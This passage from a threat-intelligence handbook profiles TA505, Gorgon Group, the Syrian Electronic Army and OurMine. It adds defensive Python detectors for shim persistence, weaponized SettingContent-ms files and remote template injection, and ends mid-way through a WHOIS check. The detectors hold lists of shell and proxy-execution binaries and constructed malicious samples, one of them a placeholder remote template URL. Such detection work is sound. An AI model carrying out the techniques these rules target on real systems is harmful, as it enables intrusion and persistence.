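The 2017 Carbanak campaign above persisted through an application shim database registered for services.exe (ATT&CK T1138). The detection logic below is an added example, not code from the handbook or from any F​IN7 sample: it runs over process-creation and registry events modelled loosely on Sysmon event IDs 1 and 13 and flags the three artefacts a shim installation leaves, namely sdbinst.exe being pointed at an .sdb outside the standard AppPatch\Custom directory, a shim registered under AppCompatFlags\Custom for a sensitive system process, and an InstalledSDB entry whose DatabasePath is outside that directory. The registry key names are the documented shim-registration locations; the events, paths and GUIDs are constructed.

```python
"""Detection logic for application-shim persistence (ATT&CK T1138) of the kind
described in the 2017 Carbanak campaign above: a custom shim database (.sdb)
registered for services.exe so that the loader patches the process in memory.

Added example, not code from the handbook or from any FIN7 sample. The events
are modelled loosely on Sysmon process-creation (ID 1) and registry value-set
(ID 13) records; every event below is constructed.
"""
import ntpath
import re

# Shim registration keys under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion.
CUSTOM_KEY_RE = re.compile(r"\\appcompatflags\\custom\\([^\\]+)\\", re.I)
INSTALLED_SDB_RE = re.compile(r"\\appcompatflags\\installedsdb\\[^\\]+\\databasepath$", re.I)
SDB_ARG_RE = re.compile(r'"?([a-z]:\\[^"\s]+\.sdb)"?', re.I)
# Where sdbinst normally copies databases; a path elsewhere is a strong signal.
EXPECTED_SDB_DIR = r"c:\windows\apppatch\custom"
# Processes a legitimate compatibility fix almost never targets.
SENSITIVE_TARGETS = {"services.exe", "lsass.exe", "svchost.exe", "winlogon.exe",
                     "explorer.exe", "csrss.exe"}

SAMPLE_EVENTS = [  # constructed
    {"EventID": 1, "Image": r"C:\Windows\System32\sdbinst.exe",
     "CommandLine": r"sdbinst.exe -q C:\Users\Public\rfc.sdb",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"EventID": 13,
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags"
                     r"\Custom\services.exe\{d2c8f1b0-3b0f-4a6e-9d2a-7f1b2e9c4d10}.sdb",
     "Details": "QWORD (0x01d30c1e-0x5f3a2b40)"},
    {"EventID": 13,
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags"
                     r"\InstalledSDB\{d2c8f1b0-3b0f-4a6e-9d2a-7f1b2e9c4d10}\DatabasePath",
     "Details": r"C:\Users\Public\rfc.sdb"},
    # Benign: a vendor compatibility fix for a line-of-business app, installed the normal way.
    {"EventID": 1, "Image": r"C:\Windows\System32\sdbinst.exe",
     "CommandLine": r"sdbinst.exe C:\Windows\AppPatch\Custom\lobapp_fix.sdb",
     "ParentImage": r"C:\Windows\System32\msiexec.exe"},
    {"EventID": 13,
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags"
                     r"\Custom\lobapp.exe\{7a1e4c2d-9b3f-4e8a-8c5d-2f6b1a9e0c33}.sdb",
     "Details": "QWORD (0x01d30c1e-0x60112233)"},
    {"EventID": 13,
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags"
                     r"\InstalledSDB\{7a1e4c2d-9b3f-4e8a-8c5d-2f6b1a9e0c33}\DatabasePath",
     "Details": r"C:\Windows\AppPatch\Custom\lobapp_fix.sdb"},
]


def analyse_shim_events(events):
    """Return one finding per suspicious shim artefact seen in the event stream."""
    findings = []
    for ev in events:
        if ev.get("EventID") == 1:
            if ntpath.basename(ev.get("Image", "")).lower() != "sdbinst.exe":
                continue
            m = SDB_ARG_RE.search(ev.get("CommandLine", ""))
            sdb = m.group(1) if m else ""
            if sdb and ntpath.dirname(sdb).lower() != EXPECTED_SDB_DIR:
                findings.append({"rule": "sdbinst_nonstandard_sdb_path", "detail": sdb,
                                 "parent": ntpath.basename(ev.get("ParentImage", "")).lower()})
        elif ev.get("EventID") == 13:
            key = ev.get("TargetObject", "")
            m = CUSTOM_KEY_RE.search(key)
            if m and m.group(1).lower() in SENSITIVE_TARGETS:
                findings.append({"rule": "shim_registered_for_sensitive_process",
                                 "detail": m.group(1).lower()})
            if INSTALLED_SDB_RE.search(key):
                path = ev.get("Details", "")
                if ntpath.dirname(path).lower() != EXPECTED_SDB_DIR:
                    findings.append({"rule": "installed_sdb_outside_apppatch", "detail": path})
    return findings


if __name__ == "__main__":
    for hit in analyse_shim_events(SAMPLE_EVENTS):
        print(hit)
```

Any one of the three rules alone can be a false positive (software packagers do call sdbinst, and some shims do target system binaries), so in practice the signal is the combination on one host within a short window, and the answer to a hit is to pull the .sdb and check which process it shims and whether it carries a patch.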

MODUS OPERANDI (ATT&CK FRAMEWORK)


Initial Access: T1193 - Spearphishing Attachment
Execution: T1053 - Scheduled Task; T1059 - Command-Line Interface; T1064 - Scripting; T1086 - PowerShell; T1170 - Mshta; T1204 - User Execution
Persistence: T1023 - Shortcut Modification; T1050 - New Service; T1053 - Scheduled Task; T1060 - Registry Run Keys / Startup Folder; T1138 - Application Shimming
Privilege Escalation: T1050 - New Service; T1053 - Scheduled Task; T1138 - Application Shimming
Defense Evasion: T1036 - Masquerading; T1064 - Scripting; T1102 - Web Service; T1116 - Code Signing; T1170 - Mshta
Collection: T1113 - Screen Capture
Command and Control: T1043 - Commonly Used Port; T1102 - Web Service

Alias: ATK103, TA505
Score: 50
Threat actor type: Cyber Criminal / Cyber Terrorist / Hacktivist / State Sponsored / Unknown
Targeted sectors: Financial Services
Motivations & objectives: Financial gain
Language: Russian

DESCRIPTION
The Threat Actor 505 (ATK103, TA505) has been active since at least 2014. It is a significant part of the email threat landscape and is responsible for the largest malicious spam campaigns Proofpoint has ever observed, distributing instances of the Dridex banking trojan, Locky ransomware, Jaff ransomware, the Trick banking trojan, and several others in very high volumes. ATK103 uses the Necurs botnet to drive massive spam campaigns. ATK103 seems to be motivated by financial gain. It is highly adaptable, often changes its malwares and techniques, uses off-the-shelf malwares and operates on a massive scale. It doesn't seem to be trying to stay stealthy. Since March 2018, ATK103 has been observed using the FlawedAmmyy RAT, a variant of the leaked Ammyy Admin 3 remote administration tool. The use of these tools suggests that this actor wants to switch from big spam campaigns to more targeted attacks. In July 2018, ATK103 was seen using SettingContent-ms files in its decoy documents. This technique was described by Matt N., and in early June 2018 MSRC responded with a note that the severity of the issue was below the bar for servicing and that the case would be closed. Some of these malwares were signed with a COMODO SECURE certificate. ATK103 seems to be a Russian-speaking group.
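A .SettingContent-ms file is a small XML document whose DeepLink element holds the command the shell runs when the file is opened; the abuse described above consists of putting a script host or shell there instead of control.exe and delivering the file inside a decoy document. The triage check below is an added example, not code from the handbook or from any TA505 sample: it parses the file, extracts the executable named by DeepLink and classifies it. The element layout follows the format as documented in Matt Nelson's write-up; both sample files are constructed, and the "malicious" one only launches calc.exe.

```python
"""Triage check for .SettingContent-ms files of the kind TA505 embedded in
decoy documents (see the description above). The DeepLink element is the
command executed on open, so a DeepLink that starts a shell or script host
instead of the Control Panel is the indicator.

Added example, not code from the handbook or from any TA505 sample. The
element names follow the format as documented in Matt Nelson's 2018
write-up; both sample files are constructed.
"""
import ntpath
import xml.etree.ElementTree as ET

SC_NS = "http://schemas.microsoft.com/Search/2013/SettingContent"
# Script hosts and proxy-execution binaries a settings shortcut has no reason to launch.
SHELL_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
               "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe"}


def _settingcontent(deep_link):
    """Constructed sample built around the element layout of a Control Panel shortcut."""
    return f"""<?xml version="1.0" encoding="UTF-8"?>
<PCSettings>
  <SearchableContent xmlns="{SC_NS}">
    <ApplicationInformation>
      <AppID>windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel</AppID>
      <DeepLink>{deep_link}</DeepLink>
      <Icon>%windir%\\system32\\control.exe</Icon>
    </ApplicationInformation>
    <SettingIdentity>
      <PageID></PageID>
      <HostID>{{12B1697E-D3A0-4DBC-B568-CCF64A3F934D}}</HostID>
    </SettingIdentity>
    <SettingInformation>
      <Description>@shell32.dll,-4161</Description>
      <Keywords>@shell32.dll,-4161</Keywords>
    </SettingInformation>
  </SearchableContent>
</PCSettings>
"""


BENIGN_FILE = _settingcontent(r"%windir%\system32\control.exe /name Microsoft.BackupAndRestoreCenter")
WEAPONIZED_FILE = _settingcontent(r'C:\Windows\System32\cmd.exe /c "calc.exe"')


def deep_link(xml_text):
    """Return the DeepLink command, tolerating files that omit the namespace."""
    root = ET.fromstring(xml_text.encode("utf-8"))
    el = root.find(f".//{{{SC_NS}}}DeepLink")
    if el is None:
        el = root.find(".//DeepLink")
    return (el.text or "").strip() if el is not None else ""


def launched_executable(deep):
    """Lower-cased basename of the program the DeepLink launches ('' for ms-settings: URIs)."""
    deep = deep.strip()
    if not deep or deep.lower().startswith("ms-settings:"):
        return ""
    if deep.startswith('"'):  # quoted path, possibly containing spaces
        end = deep.find('"', 1)
        token = deep[1:end] if end > 0 else deep[1:]
    else:
        token = deep.split()[0]
    return ntpath.basename(token).lower()


def assess(xml_text):
    """Classify a SettingContent-ms file by what its DeepLink executes."""
    deep = deep_link(xml_text)
    exe = launched_executable(deep)
    if exe in SHELL_HOSTS:
        verdict = "suspicious"
    elif exe in ("", "control.exe"):
        verdict = "benign"
    else:
        verdict = "review"  # unexpected binary: not a known shell, but not the Control Panel either
    return {"deep_link": deep, "executable": exe, "verdict": verdict}


if __name__ == "__main__":
    print(assess(BENIGN_FILE))
    print(assess(WEAPONIZED_FILE))
```

The same check can be applied at the mail gateway to attachments and to files extracted from Office packages, since the decoy documents in this campaign carried the shortcut as an embedded object rather than as a standalone attachment.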

TOOLS, MALWARES AND VULNERABILITIES

Malwares: Amadey, Bart, Dridex, FlawedAmmyy, FlawedGrace, GlobeImposter, Jaff, Locky, Philadelphia, ServHelper, TrickBot
Botnet used for distribution: Necurs
Exploited vulnerabilities: None



Targeted countries: Chile, China, Eastern Asia, Italy, Mexico, North America, South America, South Korea, Southeastern Asia, Taiwan, Western Europe
Assumed origin of the attacker: Unknown

CAMPAIGNS

TrickBot spread by the Necurs botnet, adding Nordic countries to its targets
- Date: 09/06/2017
- Targets: Nordic countries
- Tools: TrickBot, Necurs

Locky campaign - new invoice
- Date: 28/08/2017
- Targets: Classical targets
- Tool: Locky

GlobeImposter ransomware campaign
- Date: 30/11/2017 - 20/12/2017
- Targets: Classical targets
- Tool: GlobeImposter

TA505 targets the US retail industry with personalized attachments
- Date: 06/12/2018
- Targets: United States, retail
- Tool: N/A

New campaign of the Russian group TA505 directed at Chile and Argentina
- Date: 22/04/2019
- Targets: Chile, Argentina, South America
- Tool: ServHelper

Malicious documents spreading ransomware
- Date: 29/05/2019
- Targets: South Korea, North Korea, Eastern Asia
- Tools: Ammyy, Clop

TA505 is expanding its operations
- Date: 29/05/2019
- Targets: Italy, Western Europe
- Tool: N/A

Breaking down TA505 group's use of HTML and RATs
- Date: 12/06/2019
- Targets: Taiwan, Mexico, Italy, South Korea, China, Chile
- Tools: RATs

TA505 using new malware Gelup and Flowerpipi
- Date: 04/07/2019
- Targets: Argentina, Philippines, Japan, South America, Eastern Asia
- Tools: Flowerpipi, Gelup

TA505 impersonates airlines
- Date: 25/07/2019
- Targets: South Korea, Eastern Asia
- Tool: FlawedAmmyy

MODUS OPERANDI (ATT&CK FRAMEWORK)


Initial Access: T1192 - Spearphishing Link; T1193 - Spearphishing Attachment
Execution: T1064 - Scripting; T1085 - Rundll32; T1086 - PowerShell; T1173 - Dynamic Data Exchange; T1204 - User Execution; T1218 - Signed Binary Proxy Execution
Defense Evasion: T1027 - Obfuscated Files or Information; T1064 - Scripting; T1085 - Rundll32; T1116 - Code Signing; T1218 - Signed Binary Proxy Execution
Credential Access: T1081 - Credentials in Files
Lateral Movement: T1105 - Remote File Copy
Command and Control: T1105 - Remote File Copy
Impact: T1486 - Data Encrypted for Impact

Alias: ATK92, GORGON GROUP, SUBAAT, TAG-CR5
Score: 48
Threat actor type: Cyber Criminal / Cyber Terrorist / Hacktivist / State Sponsored / Unknown
Targeted sectors: Government Agencies
Motivations & objectives: Organizational gain
Language: Urdu

DESCRIPTION
Gorgon Group is engaged both in cyber criminal attacks and in targeted attacks against worldwide governmental organizations. The group has been active since 2017 and is believed to be operating from Pakistan. The group's campaigns targeted government organizations in the United Kingdom, Spain, Russia, and the United States.

CAMPAIGNS

July 2017 - Phishing campaign targeting a US-based government organization
During the campaign, the threat actors sent over 40 emails containing three unique files, two RTFs and a Microsoft Excel file. The RTF files exploited CVE-2012-0158 and were used as downloaders to deliver the QuasarRAT malware family. In addition, the RTFs used obfuscation within the documents themselves, making it more difficult to extract the embedded shellcode. The Excel file contained malicious macros that eventually drop and execute Crimson Downloader. The QuasarRAT was downloaded from a host named subaat[.]com. Later, security researchers found out that Subaat was possibly part of a larger crew of individuals responsible for carrying out targeted attacks against worldwide governmental organizations. This larger crew is named Gorgon Group.

February 2018 - Phishing campaign against the United Kingdom, Spain, Russia, Switzerland and the United States
In February 2018, Gorgon Group started a campaign of cyber-attacks against governmental organizations in the United Kingdom, Spain, Russia, and the United States. In addition, at the same time, members of Gorgon Group also attacked targets in criminal operations across the globe, often using shared infrastructure with their targeted attack operations. During the campaign the group sent phishing emails containing malicious Microsoft Word documents exploiting a vulnerability in Microsoft Office. The payload was delivered via bitly, a URL shortener. The attack process used bitly as part of the dropping process when communicating with the command server.

March 2019 - Aggah campaign
In March 2019, phishing emails were sent to education, media/marketing, medical, technology, and government organizations in the Middle East, United States, Europe and Asia. During the campaign, the attackers sent Word documents that attempted to load a remote OLE document via template injection. The OLE document contains a macro which obtains a script that uses multiple Pastebin pastes to download additional scripts, which finally download RevengeRAT. Of note, it is uncertain whether this campaign is indeed associated with the Gorgon Group.
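Remote template injection, the delivery mechanism of the Aggah campaign above, leaves a recognisable trace in the document package itself: the relationship that links the settings part to its attached template points at an external URL instead of a local path. The check below is an added example, not code from the handbook or from any Aggah sample. It builds two minimal .docx packages in memory (one with a remote template, one with a local template as Word normally writes it) and scans every relationships part for auto-fetched relationship types with a network target, so it also catches the related oleObject and frame variants rather than only attachedTemplate. The relationship type URIs are those of the Office Open XML package format; the template URL is a placeholder.

```python
"""Check a .docx for remote template injection, the initial-access technique
attributed to the March 2019 Aggah campaign above: the document's settings part
carries an attachedTemplate relationship whose target is an external URL, so
Word fetches a remote .dotm (and can run its macros) when the file is opened.

Added example, not code from the handbook or from any Aggah sample. The
relationship type URIs are those of the Office Open XML package format; the two
documents below are built in memory and the template URL is a placeholder.
"""
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
# Relationship types whose external target Word fetches on its own when the document opens.
AUTO_FETCH_TYPES = {"attachedTemplate", "oleObject", "frame", "subDocument"}
# Anything reachable over the network; plain file: paths to local templates are normal.
REMOTE_PREFIXES = ("http://", "https://", "ftp://", "\\\\")

CONTENT_TYPES = ('<?xml version="1.0" encoding="UTF-8"?>'
                 '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
SETTINGS = ('<?xml version="1.0" encoding="UTF-8"?>'
            '<w:settings xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" '
            'xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">'
            '<w:attachedTemplate r:id="rId1"/></w:settings>')


def build_docx(template_target):
    """Constructed minimal package with just the parts the check reads (not a file Word would open)."""
    rels = ('<?xml version="1.0" encoding="UTF-8"?>'
            f'<Relationships xmlns="{REL_NS}">'
            f'<Relationship Id="rId1" Type="{OFFICE_REL}attachedTemplate" '
            f'Target="{template_target}" TargetMode="External"/>'
            '</Relationships>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", CONTENT_TYPES)
        z.writestr("word/settings.xml", SETTINGS)
        z.writestr("word/_rels/settings.xml.rels", rels)
    return buf.getvalue()


def external_relationships(docx_bytes):
    """Return every auto-fetched relationship, in any .rels part, whose target is remote."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                rtype = rel.get("Type", "").rsplit("/", 1)[-1]
                target = rel.get("Target", "")
                if rel.get("TargetMode") != "External" or rtype not in AUTO_FETCH_TYPES:
                    continue
                if target.lower().startswith(REMOTE_PREFIXES):
                    findings.append({"part": name, "type": rtype, "target": target})
    return findings


# Constructed samples: a remote template (the Aggah pattern) and a local one (normal Word behaviour).
INJECTED_DOCX = build_docx("http://templates.example.com/quarterly.dotm")
LOCAL_TEMPLATE_DOCX = build_docx(
    "file:///C:\\Users\\analyst\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm")


if __name__ == "__main__":
    print(external_relationships(INJECTED_DOCX))
    print(external_relationships(LOCAL_TEMPLATE_DOCX))
```

Because the injected document itself contains no macro, macro-centric scanners pass it; the relationship target is the only static indicator, which is why the scan reads the package rather than the document body.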

TOOLS, MALWARES AND VULNERABILITIES

Malwares
Custom tools: None identified
Publicly available tools: Crimson (remote-access Trojan), Lokibot, NanocoreRAT, NjRat, QuasarRAT, RemcosRAT, RevengeRAT
Legitimate software: Bitly, PowerShell
Exploited vulnerabilities: CVE-2017-0199, CVE-2012-0158



Targeted countries: Russia, Spain, Switzerland, United Kingdom, United States
Assumed origin of the attacker: Pakistan

MODUS OPERANDI (ATT&CK FRAMEWORK)

Initial Access: T1193 - Spearphishing Attachment
Execution: T1059 - Command-Line Interface; T1064 - Scripting; T1086 - PowerShell; T1106 - Execution through API; T1204 - User Execution
Persistence: T1023 - Shortcut Modification; T1060 - Registry Run Keys / Startup Folder
Privilege Escalation: T1055 - Process Injection
Defense Evasion: T1055 - Process Injection; T1064 - Scripting; T1089 - Disabling Security Tools; T1093 - Process Hollowing; T1112 - Modify Registry; T1140 - Deobfuscate/Decode Files or Information
Lateral Movement: T1105 - Remote File Copy
Collection: T1056 - Input Capture; T1113 - Screen Capture; T1119 - Automated Collection
Command and Control: T1065 - Uncommonly Used Port; T1105 - Remote File Copy

Alias: ATK196, Syrian Electronic Army, SEA, Syria Malware Team, TAG-CT2
Score: 47
Threat actor type: Cyber Criminal / Cyber Terrorist / Hacktivist / State Sponsored / Unknown
Targeted sectors: Communication, Defense, Government Agencies, High-Tech, Media, Military, Political Organizations, Retail
Motivations & objectives: Coercion, Dominance, Ideology, Notoriety, Organizational gain, Revenge, Unpredictable
Language: English, Arabic

DESCRIPTION
The Syrian Electronic Army is a hacking group active since the beginning of the Syrian Civil War in 2011. The group supports the current regime of Bashar Al-Assad and, according to several reports, it is actually part of it. At the height of the civil war, the group launched many cyber-attacks, usually against online platforms of media outlets, in order to deface them and spread their pro-Syrian regime agenda. The attacks and defacements were not just against the official websites of the media outlets, but also against their social media accounts and even their registrar. In addition, the group is known to use different types of malware, usually against groups and individuals that oppose Al-Assad's regime. These malwares are of various types and usually have advanced capabilities. They usually used spear-phishing as their attack vector, but also other techniques such as watering holes. All of this indicates the high professional level of its members and their capabilities. Their attacks were occasionally launched by groups and hackers affiliated with the SEA, such as the Syrian Malware Team, who share infrastructure and personnel with the SEA. Of note, in recent years, cyber-attacks affiliated with the group have become more and more rare.

TOOLS, MALWARES AND VULNERABILITIES

Malwares
Custom tools: SilverHawk, [PHP] SyRiAn Electronic Army Webshell, Daleth RAT, FoxSploit Firefox Addon Exploit Builder
Tools used by multiple adversaries: BlackWorm
Publicly available tools: None identified
Legitimate software: None identified
Exploited vulnerabilities: None identified



Targeted countries: Canada, France, United Kingdom, United States
Assumed origin of the attacker: Syria

CAMPAIGNS

July 2013 - Tango and Viber attack
The VoIP apps Tango and Viber were hacked by the group, and technical and customer data was stolen. They were able to steal the server directory and app log, alongside user content.

End of 2013 - 2015 - Phishing attacks against the Syrian opposition
The group compromised email accounts of Syrian personnel active in Syrian opposition groups who lived outside of Syria. At first, an email account of a member of one of the organizations was hacked to gain a foothold in the system. In order to obtain the account information, different attack vectors were used, such as brute force and spear-phishing. Following this, the attacker downloaded all the data saved on the compromised account, such as old messages, address book and more. At the last stage, the attackers used the compromised account to launch spear-phishing attacks against users from the same organization.

February 2014 - Changing Facebook's WHOIS information
The group hacked the administrator account of MarkMonitor, the registrar of Facebook. Following this, they changed the contact information in Facebook's WHOIS records to be those of the SEA. They also claimed that they were able to hijack the domain, but that was denied by Facebook. They claimed they did it as retaliation for closing Facebook pages connected to the group.

April 2014 - Reuters attack
The homepage of the website of Reuters was defaced by the SEA. In this campaign they targeted a third-party service, Taboola, which uploads its code into Reuters' website. It is unclear how Taboola was hacked, but it is believed it was done through phishing attacks, as in other attacks of the group. By hacking Taboola's widget, the visitors to Reuters' website were redirected to another website controlled by the SEA, calling to stop spreading fake news about Syria and calling on the British government to stop supporting the “terrorists”.

July 2014 - BlackWorm campaign
The Syrian Malware Team, which is highly affiliated with the Syrian Electronic Army, used the BlackWorm malware against different victims, who were not disclosed.

November 2014 - British and American media outlets attacks
The SEA hacked a few American and British news outlets such as the Daily Telegraph, the Canadian Broadcasting Corporation and the New York Daily News, and retail companies such as Walmart Canada, defacing their websites.

January 2015 - Le Monde hack
The group took over the Twitter account of the French newspaper Le Monde after they acquired its credentials through a spear-phishing attack. During that time, they tweeted against the French support of the Syrian opposition. In addition, the newspaper announced that there was an attempt to launch a DDoS attack against its website to bring it down at the same time.

July 2015 - US Army website hack
The group hacked the US Army website and displayed a pop-up message to all the visitors of the website saying: “Your commanders admit they are training the people they have sent you to die fighting.”

August 2015 - Washington Post hack
The campaign started when spear-phishing emails were sent to Washington Post journalists, until one of the sports writers was enticed to provide the password to his email. Through this account, the group sent additional phishing emails, most probably containing malware, to other employees. After gaining access to the website, they were able to redirect readers of the website to the SEA website and take over Twitter accounts of some of the journalists to spread pro-Syrian slogans. The paper also claimed that the attack was done by hacking Outbrain, a third-party service they use for content recommendation.

2016 - 2018 - SilverHawk campaign
The group used fake updates for messaging apps to spread the SilverHawk malware against different victims.

December 2017 - Attack against the Syrian opposition websites and social media accounts
The group took down websites and social media pages operated by the Syrian opposition. The SEA did it by taking control of the websites themselves, or by reporting those websites and accounts to the social media platform.

Timeline:
Jul-2013 - Tango and Viber attack
End of 2013 - Phishing attacks against the Syrian opposition
Feb-2014 - Changing Facebook's WHOIS information
Apr-2014 - Reuters attack
Jul-2014 - BlackWorm campaign
Nov-2014 - British and American media outlets attacks
Jan-2015 - Le Monde hack
Jul-2015 - US Army website hack
Aug-2015 - Washington Post hack
2016-2018 - SilverHawk campaign
Dec-2017 - Attack against the Syrian opposition websites and social media accounts

Alias: ATK 196, Syrian Electronic Army, SEA, Syria Malware Team, TAG-CT2
Score: 47
Threat Actor: Cyber Criminal / Cyber Terrorist / Hacktivist / State Sponsored / Unknown
Targeted Sectors: Communication, Defense, Government Agencies, High-Tech, Media, Military, Political Organizations, Retail
Motivations & Objectives: Coercion, Dominance, Ideology, Notoriety, Organizational-gain, Revenge, Unpredictable
Language: English, Arabic
Targeted Countries: Canada, France, United Kingdom, United States
Assumed origin of the attacker: Syria

128 The Cyberthreat Handbook • Thales - Verint

MODUS OPERANDI (ATT&CK FRAMEWORK)
Initial Access
T1189 - Drive-by Compromise
T1192 - Spearphishing Link
T1193 - Spearphishing Attachment
T1476 - Deliver Malicious App via Other Means (M)
Execution
T1072 - Third-party Software
Persistence
T1100 - Web Shell
T1176 - Browser Extensions
Privilege Escalation
T1088 - Bypass User Account Control
T1100 - Web Shell
Defense Evasion
T1088 - Bypass User Account Control
T1089 - Disabling Security Tools
T1112 - Modify Registry
T1453 - Abuse Accessibility Features (M)
Discovery
T1018 - Remote System Discovery
Lateral Movement
T1021 - Remote Services
T1072 - Third-party Software
Collection
T1123 - Audio Capture
T1429 - Microphone or Camera Recordings (M)
T1432 - Access Contact List (M)
Command and Control
T1094 - Custom Command and Control Protocol
Impact
T1489 - Service Stop
T1498 - Network Denial of Service

Alias: ATK128, OurMine, OurMine (security group), TAG-HA10
Score: 40
Threat Actor: Cyber Criminal / Cyber Terrorist / Hacktivist / State Sponsored / Unknown
Targeted Sectors: Casino & Gaming, Communication, High-Tech, Media
Motivations & Objectives: Coercion, Dominance, Personal-gain, Personal-satisfaction, Revenge
Language: English

DESCRIPTION
OurMine is a hacking group active since mid-2016 that has been identified as being from Saudi Arabia. They are mostly known for taking over the Twitter accounts of high-ranking personnel, such as CEOs of large corporations, and the Twitter accounts of organizations themselves. In most cases they claimed that they took over the account to show its owner its low level of security, while requesting that the owner contact the group directly to solve the problem. This shows that the group presents itself as a kind of grey-hat group that looks for vulnerabilities and security issues in order to receive money from the companies in which these issues were found. This was also the case with the two DDoS attacks they launched against HSBC bank and Pokemon Go (in 2016 and 2017 respectively), allegedly to enhance the level of security of those companies. However, even though OurMine tried to present themselves as a group that enhances the cyber security of companies, some of their attacks were done as revenge. For example, they took over a media website after it published an article that allegedly revealed the real identity of the threat actor behind the group, a teen from Saudi Arabia. Another example was when they leaked information of a company that did not contact them about security issues they had found in its servers. Furthermore, in some cases they tried to brag about their capabilities, as when they were challenged to hack the website of WikiLeaks in 2017. Overall, the group did not launch very sophisticated attacks, and all the attacks were detected very quickly. Of note, since mid-2017 the group has not been active, and their website seems to be under maintenance.

TOOLS, MALWARES AND VULNERABILITIES


Malwares
Custom tools: None Identified
Tools used by multiple adversaries: None Identified
Publicly available tools: None Identified
Legitimate software: None Identified
Exploited vulnerabilities: None Identified



Targeted Countries: United Kingdom, United States
Assumed origin of the attacker: Saudi Arabia

CAMPAIGNS
June 2016 - Twitter accounts hack
The group hacked the social media accounts of several high-level personnel in large corporations. In their tweets they mostly tried to show that they were able to hack the account because of low security measures, and thus to show their capabilities and their services. The first attack was against Mark Zuckerberg, the founder and president of Facebook. In this case, the hackers were able to gain control for a short while of Zuckerberg's LinkedIn, Pinterest and Twitter accounts, and also attempted to attack his Instagram account and publish different posts there. According to them, they were able to find the password to the LinkedIn account from its famous leak of 2012. The second was the former Twitter CEO, Dick Costolo, from whose account they tweeted that it had been hacked by OurMine. The third person hacked by the group was Google's CEO Sundar Pichai. The group gained access to his Twitter account by hacking his Quora account. The fourth person was Uber's CEO, Travis Kalanick, whose Twitter account was also hacked by the group in a similar way. In addition, they hacked the Twitter accounts of other known personnel, such as novelist Hank Green, journalist Matthew Yglesias and more.

July 2016 - HSBC bank DDoS attack
OurMine launched a massive DDoS attack against the servers of HSBC bank, which mainly affected their domains in the US and UK. After a few hours, the group claimed that it had stopped the attack, and requested that a representative of the bank contact them directly.

August 2016 - Jimmy Wales Twitter account hack
The Twitter account of Wikipedia founder Jimmy Wales was hacked by the group, which tweeted that he had passed away and that OurMine is a real group. The account was restored shortly after.

October 2016 - BuzzFeed hack
The news website BuzzFeed was hacked by OurMine as revenge for an article BuzzFeed published, which claimed to identify the person behind the group. OurMine were able to deface one of the articles on the website's main page and claimed that they had the website's database, which would be leaked if BuzzFeed continued to talk about them.

21 December 2016 - NFL, Netflix and Marvel's Twitter accounts hack on the same day
The Twitter accounts of Netflix, the NFL and Marvel's characters were all hacked by OurMine. In all the cases, the same message was written: "Hey, it's OurMine, don't worry we are just testing your security. Contact us to help you with your security". Furthermore, in all cases the accounts were restored in a short while.

July 2017 - Pokemon Go DDoS attack
The group launched a DDoS attack against the servers of Pokemon Go, which prevented players from logging in to the game. In this case too, the group said that the game would be unavailable until the company contacted them to solve their security issues. In a short while the game started to work again.

July 2017 - TechCrunch hack
The group attacked the news website TechCrunch and changed the message on the main page. They said that they did not change any password and asked the owners of the website to contact them. The website itself came back to normal very fast, and it was claimed that the attack was not very advanced.

August 2017 - WikiLeaks hack
The website of WikiLeaks was hacked by OurMine, and its homepage was defaced. According to their message, the group defaced the website because they were challenged to do so by Anonymous. They also accused Anonymous of publishing a fake paste that allegedly included the information of all the members of the group. WikiLeaks denied it was hacked, and it was found that the group actually used the technique of DNS hijacking to make it look as if the website was hacked, while actually they hacked the domain name server.

August 2017 - Game of Thrones Twitter account hack
The Twitter account of Game of Thrones was hacked by the group, which tweeted that OurMine did it because they were testing the security of its owners.

September 2017 - VEVO data leak
Vevo, the music corporation, was hacked, and about 3.12TB of internal data were leaked online, allegedly by OurMine. Among the stolen information were videos and promotional material, alongside business information. The group claimed that it had approached the company before publishing the data but was disregarded, so they leaked the data as retaliation. All the information was published on the website of the group.
Timeline:
Jun-2016 - Twitter accounts hack
Jul-2016 - HSBC bank DDoS attack
Aug-2016 - Jimmy Wales Twitter account hack
Oct-2016 - BuzzFeed hack
Dec-2016 - NFL, Netflix and Marvel's Twitter accounts hack on the same day
Jul-2017 - Pokemon Go DDoS attack; TechCrunch hack
Aug-2017 - WikiLeaks hack; Game of Thrones Twitter account hack
Sep-2017 - VEVO data leak
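The Facebook WHOIS change by the SEA and the WikiLeaks DNS hijack by OurMine both altered registration or delegation data rather than the victims' web servers, so a site can look defaced while the server itself is untouched. The script below is an added example, not code from the handbook or from any group it describes, of a defender-side baseline check over a registrar's WHOIS record and the live NS delegation; the domain, contacts, nameservers and WHOIS text are constructed placeholders.

```python
"""Domain-integrity baseline check. Added example, not the handbook's own
code; every domain, contact, nameserver and WHOIS line below is constructed."""
from dataclasses import dataclass


@dataclass(frozen=True)
class DomainBaseline:
    domain: str
    registrar: str
    registrant_email: str
    nameservers: frozenset  # lower-case FQDNs, no trailing dot


@dataclass(frozen=True)
class Finding:
    severity: str  # "high": delegation changed; "medium": registrar account data changed
    field_name: str
    expected: str
    observed: str


def parse_whois(text: str) -> dict:
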